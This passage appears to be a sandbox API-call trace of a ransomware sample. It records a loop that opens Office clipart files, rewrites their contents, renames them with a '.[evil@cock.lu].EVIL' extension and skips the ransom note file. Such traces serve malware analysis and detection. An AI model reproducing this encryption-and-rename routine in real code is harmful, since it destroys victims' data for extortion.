_ShFlag=64) returned 0x7ffc020ee2a0 [0153.723] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.723] __uncaught_exception () returned 0x84b1160800 [0153.723] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.723] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0278702.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0278702.wmf.[evil@cock.lu].evil")) returned 1 [0153.724] ??_V@YAXPEAX@Z () returned 0x1 [0153.727] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF", dwFileAttributes=0x200) returned 0 [0153.727] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.727] wcsstr (_Str="J0279644.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.727] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF") returned 69 [0153.727] wcscmp (_String1="J0279644.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.727] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0279644.WMF") returned 0x0 [0153.727] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF") returned 0x45 [0153.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0279644.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.729] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4330, lpOverlapped=0x0) returned 1 [0153.731] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.731] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.731] _errno () returned 0x84b1160840 [0153.731] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.731] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4340, lpOverlapped=0x0) returned 1 [0153.731] CloseHandle (hObject=0x1a8) returned 1 [0153.731] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.732] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.732] __uncaught_exception () returned 0x84b1160800 [0153.732] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.732] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0279644.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0279644.wmf.[evil@cock.lu].evil")) returned 1 [0153.733] ??_V@YAXPEAX@Z () returned 0x1 [0153.735] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF", dwFileAttributes=0x200) returned 0 [0153.735] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.735] wcsstr (_Str="J0280468.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.735] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF") returned 69 [0153.735] wcscmp (_String1="J0280468.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.735] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0280468.WMF") returned 0x0 [0153.736] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF") returned 0x45 [0153.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0280468.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.738] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x11dee, lpOverlapped=0x0) returned 1 [0153.750] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.750] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.750] _errno () returned 0x84b1160840 [0153.750] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.750] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x11e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x11e00, lpOverlapped=0x0) returned 1 [0153.750] CloseHandle (hObject=0x1a8) returned 1 [0153.750] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.750] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.750] __uncaught_exception () returned 0x84b1160800 [0153.750] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.751] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0280468.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0280468.wmf.[evil@cock.lu].evil")) returned 1 [0153.751] ??_V@YAXPEAX@Z () returned 0x1 [0153.755] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF", dwFileAttributes=0x200) returned 0 [0153.755] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.755] wcsstr (_Str="J0281008.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.755] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF") returned 69 [0153.755] wcscmp (_String1="J0281008.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.755] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0281008.WMF") returned 0x0 [0153.755] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF") returned 0x45 [0153.755] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281008.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.758] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x94c4, lpOverlapped=0x0) returned 1 [0153.762] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.762] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.762] _errno () returned 0x84b1160840 [0153.762] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.762] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x94e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x94e0, lpOverlapped=0x0) returned 1 [0153.762] CloseHandle (hObject=0x1a8) returned 1 [0153.762] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.763] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.763] __uncaught_exception () returned 0x84b1160800 [0153.763] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.763] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281008.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281008.wmf.[evil@cock.lu].evil")) returned 1 [0153.764] ??_V@YAXPEAX@Z () returned 0x1 [0153.767] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF", dwFileAttributes=0x200) returned 0 [0153.767] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.767] wcsstr (_Str="J0281243.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.767] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF") returned 69 [0153.767] wcscmp (_String1="J0281243.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.767] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0281243.WMF") returned 0x0 [0153.767] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF") returned 0x45 [0153.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281243.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.770] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb5b4, lpOverlapped=0x0) returned 1 [0153.773] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.773] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.773] _errno () returned 0x84b1160840 [0153.773] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.773] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xb5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb5c0, lpOverlapped=0x0) returned 1 [0153.773] CloseHandle (hObject=0x1a8) returned 1 [0153.773] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.774] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.774] __uncaught_exception () returned 0x84b1160800 [0153.774] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.774] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281243.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281243.wmf.[evil@cock.lu].evil")) returned 1 [0153.775] ??_V@YAXPEAX@Z () returned 0x1 [0153.778] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF", dwFileAttributes=0x200) returned 0 [0153.778] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.778] wcsstr (_Str="J0281630.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.778] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF") returned 69 [0153.778] wcscmp (_String1="J0281630.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.778] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0281630.WMF") returned 0x0 [0153.778] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF") returned 0x45 [0153.778] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281630.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.780] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x31dc, lpOverlapped=0x0) returned 1 [0153.783] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.783] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.783] _errno () returned 0x84b1160840 [0153.783] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.783] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x31e0, lpOverlapped=0x0) returned 1 [0153.783] CloseHandle (hObject=0x1a8) returned 1 [0153.783] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.783] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.784] __uncaught_exception () returned 0x84b1160800 [0153.784] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.784] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281630.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281630.wmf.[evil@cock.lu].evil")) returned 1 [0153.785] ??_V@YAXPEAX@Z () returned 0x1 [0153.788] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF", dwFileAttributes=0x200) returned 0 [0153.788] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.788] wcsstr (_Str="J0281632.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.788] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF") returned 69 [0153.788] wcscmp (_String1="J0281632.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.788] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0281632.WMF") returned 0x0 [0153.788] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF") returned 0x45 [0153.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281632.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.790] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3854, lpOverlapped=0x0) returned 1 [0153.793] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.793] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.793] _errno () returned 0x84b1160840 [0153.793] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.793] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3860, lpOverlapped=0x0) returned 1 [0153.793] CloseHandle (hObject=0x1a8) returned 1 [0153.794] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.794] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.794] __uncaught_exception () returned 0x84b1160800 [0153.794] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.794] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281632.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281632.wmf.[evil@cock.lu].evil")) returned 1 [0153.795] ??_V@YAXPEAX@Z () returned 0x1 [0153.798] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF", dwFileAttributes=0x200) returned 0 [0153.798] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.798] wcsstr (_Str="J0281638.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.798] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF") returned 69 [0153.798] wcscmp (_String1="J0281638.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.798] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0281638.WMF") returned 0x0 [0153.798] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF") returned 0x45 [0153.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281638.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.801] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2e88, lpOverlapped=0x0) returned 1 [0153.804] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.804] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.804] _errno () returned 0x84b1160840 [0153.804] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.804] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ea0, lpOverlapped=0x0) returned 1 [0153.804] CloseHandle (hObject=0x1a8) returned 1 [0153.805] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.805] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.805] __uncaught_exception () returned 0x84b1160800 [0153.805] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.805] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281638.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281638.wmf.[evil@cock.lu].evil")) returned 1 [0153.806] ??_V@YAXPEAX@Z () returned 0x1 [0153.809] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF", dwFileAttributes=0x200) returned 0 [0153.809] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.809] wcsstr (_Str="J0281640.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.810] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF") returned 69 [0153.810] wcscmp (_String1="J0281640.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.810] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0281640.WMF") returned 0x0 [0153.810] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF") returned 0x45 [0153.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281640.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.812] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30f2, lpOverlapped=0x0) returned 1 [0153.815] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.815] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.815] _errno () returned 0x84b1160840 [0153.815] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.815] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3100, lpOverlapped=0x0) returned 1 [0153.815] CloseHandle (hObject=0x1a8) returned 1 [0153.816] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.816] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.816] __uncaught_exception () returned 0x84b1160800 [0153.816] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.816] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281640.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft 